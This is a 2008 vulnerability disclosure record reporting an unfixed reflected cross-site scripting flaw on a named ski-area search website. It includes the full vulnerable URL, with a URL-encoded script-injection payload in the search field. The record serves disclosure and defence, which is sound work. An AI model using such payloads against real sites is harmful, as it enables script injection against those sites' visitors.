Unfixed XSS vulnerability at www.skigebietssuche.info

2008-03-04T00:00:00
ID XSSED:34990
Type xssed
Reporter Hanno Boeck
Modified 2008-03-04T00:00:00

Description

Security researcher Hanno Boeck, has submitted on 03/04/2008 a cross-site-scripting (XSS) vulnerability affecting www.skigebietssuche.info, which at the time of submission ranked 4311236 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 03/04/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.skigebietssuche.info/de/index.php?move=0&volltextsuchbegriff=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&landsonst%5B%5D=1&landsonst%5B%5D=2&landsonst%5B%5D=4&landsonst%5B%5D=3&landsonst%5B%5D=5&landsonst%5B%5D=7&landsonst%5B%5D=16&landsonst%5B%5D=9&landsonst%5B%5D=15&landsonst%5B%5D=18&landsonst%5B%5D=8&landsonst%5B%5D=11&landsonst%5B%5D=17&landsonst%5B%5D=20&landsonst%5B%5D=10&landsonst%5B%5D=13&landsonst%5B%5D=14&landsonst%5B%5D=6&landsonst%5B%5D=12&tal=0&berg=0&diff=0&pistengesamt=0&pistenleicht=0&pistenmittel=0&pistenschwer=0&liftgesamt=0&liftgonsess=0&liftschlepp=0&liftsess=0&liftgonkl=0&liftgongr=0&ort_txtfld=&entfernungmax=10000&page_size=10&submit.x=0&submit.y=0